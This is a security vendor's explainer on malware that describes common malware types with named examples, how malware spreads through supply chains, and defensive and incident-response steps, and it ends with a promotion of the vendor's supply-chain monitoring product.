What Is Malware?

Malicious software, or malware, is any code intentionally designed to infiltrate, disrupt, or damage systems, networks, or users. It operates without consent and often without visibility.

While malware has existed for decades, it continues to serve as a primary access vector and launchpad for breaches from cybercriminals and foreign intelligence services alike. Protecting against malware in your organization’s own networks may not be enough to protect against malware infections, however. Hackers are increasingly targeting vendors, cloud platforms, and supply chains with malware to wage malicious cyber-operations, according to SecurityScorecard research.

SecurityScorecard’s 2025 Global Third-Party Breach Report shows:

• 16 of the top 25 threat actors in the past year were ransomware actors, including C10p, LockBit, RansomHub, BlackSuit, Akira, and Medusa
• Ransomware—a kind of malware that encrypts its targets or locks users out of systems—came from third-party breaches 41.4% of the time in the past year

Why Malware Still Dominates

Despite advances in endpoint detection, malware continues to work in 2025 because:

• It evolves faster than traditional defenses
• Hackers can adapt it and tailor it to different targets
• It’s now delivered through vendors and trusted systems
• It combines access, espionage, and extortion in one toolset
• Hackers can use obfuscation in their attacks to evade detection

But malware often travels stealthily, such as through a software update a misconfigured file transfer tool.

7 Common Malware Types

SecurityScorecard tracks over 120 threat groups and surfaces infection information on over 150 malware families regularly through its sinkhole.

The STRIKE Team’s in-house malware information sharing platform (MISP) and threat sharing feeds provide a plethora of data to inform security programs and drive contextualized decision-making. SecurityScorecard’s malware attribution system includes over 1 million classified command-and-control IP addresses and over 350,000 classified malware samples.

Malware generally breaks down into a few distinct and linked categories:

1. Ransomware

Encrypts systems or data and demands payment for restoration. Modern ransomware variants and groups may also steal data, threaten leaks, or attack targeted organizations on multiple occasions.

Examples: C10p, LockBit, RansomHub
Defense: Segment networks, maintain offline backups, monitor for early signs of lateral movement.

2. Trojans

Disguised as legitimate software, trojans (a name that pays homage to trojan horses) create hidden access points for attackers.

Examples: Emotet, TrickBot
Defense: Verify software sources, monitor traffic to known command-and-control (C2) IPs, use Endpoint Detection and Response (EDR) tools.

3. Spyware

Silently records user activity, capturing keystrokes, credentials, or screen data. Can be installed without user awareness.

Examples: Zeus, Red Shell
Defense: Restrict permissions, monitor browser and app behavior, provide anti-phishing training.

4. Adware

Injects unwanted ads or redirects browser activity. Attackers can also use it to install more serious threats.

Examples: Fireball, DollarRevenue
Defense: Block unauthorized browser extensions, enforce browsing security policies, and avoid visiting unsafe sites. Monitor for decreased system performance or new and unauthorized apps.

5. Worms

Self-replicating malware that spreads across systems without user input.

Examples: WannaCry, Conficker
Defense: Patch vulnerabilities, close unnecessary ports, limit cross-system access.

6. Rootkits

Embed deeply in system processes or firmware, granting persistent attacker access and control over victim devices.

Examples: Necurs, ZeroAccess
Defense: Monitor for low-level system changes, use integrity validation tools, restrict admin privileges.

7. Fileless Malware

Operates entirely in memory, often using legitimate system tools such as PowerShell.

Examples: Frodo, Number of the Beast
Defense: Disable unnecessary scripting, log command-line activity, deploy behavior-based detection.

How Malware Reaches You: The Supply Chain Factor

Sophisticated threat actors use malware that rarely breaches noisily. Instead, it often arrives through:

• Infected file transfer platforms like Cleo or MOVEit
• Email phishing operations
• Cloud tools
• Trojanized software updates

Third-party ecosystems now act as launchpads for malware delivery across industries.

How to Detect and Prevent Malware in 2025

1. Use Threat Intelligence for Context

Correlate malware samples and campaigns using real-world data. This can enable visibility into:

• Which malware families are active
• Which vendors or partners are compromised
• Whether suspicious activity matches known threat actor tactics

SecurityScorecard maintains a network of honeypots and sinkholes that detect internet-based malware and allow SecurityScorecard to report malware issues, track malware signals from command-and-control infrastructure, and track threat actor behavior. SecurityScorecard also collects data on botnet activity. 

2. Monitor Command-and-Control Activity

C2 infrastructure is often reused. Watch for traffic to:

• Sinkholed domains
• Known botnet IPs
• Emerging C2 networks flagged by threat intelligence

SecurityScorecard collects over 2 billion DNS requests per day to identify early signals of compromise.

3. Segment and Contain Early

Once malware lands, speed matters. Contain affected systems through:

• Network segmentation
• Access restrictions
• Rapid threat isolation protocols

Containment efforts can prevent data theft, encryption, or lateral movement.

4. Audit Third-Party Access and Credentials

Attackers can deliver malware by using stolen or reused credentials or targeting third parties with weak security practices. Ask:

• Does your vendor enforce multi-factor authentication (MFA) organization-wide?
• Do they store tokens or admin passwords insecurely?
• Have they disclosed malware infections in the past?

SecurityScorecard’s Supply Chain Detection and Response (SCDR) solution tracks vendor credential exposure, malware presence, and third- and fourth-party access risks.

What to Do After Malware Is Detected

• Isolate the system immediately
• Preserve logs, memory dumps, and forensic artifacts
• Notify legal, security, and affected partners
• Investigate scope, including third-party involvement
• Remove malware and patch exploited vulnerabilities
• Document and update playbooks for future response

If a vendor was the source, activate your third-party breach protocol.

Protect Your Supply Chain with Real-Time Threat Detection
SecurityScorecard’s SCDR solution offers continuous monitoring of your third-party ecosystem, enabling swift identification and mitigation of cyber threats. Enhance your organization’s resilience by proactively managing supply chain risks.
🔗 Understand SCDR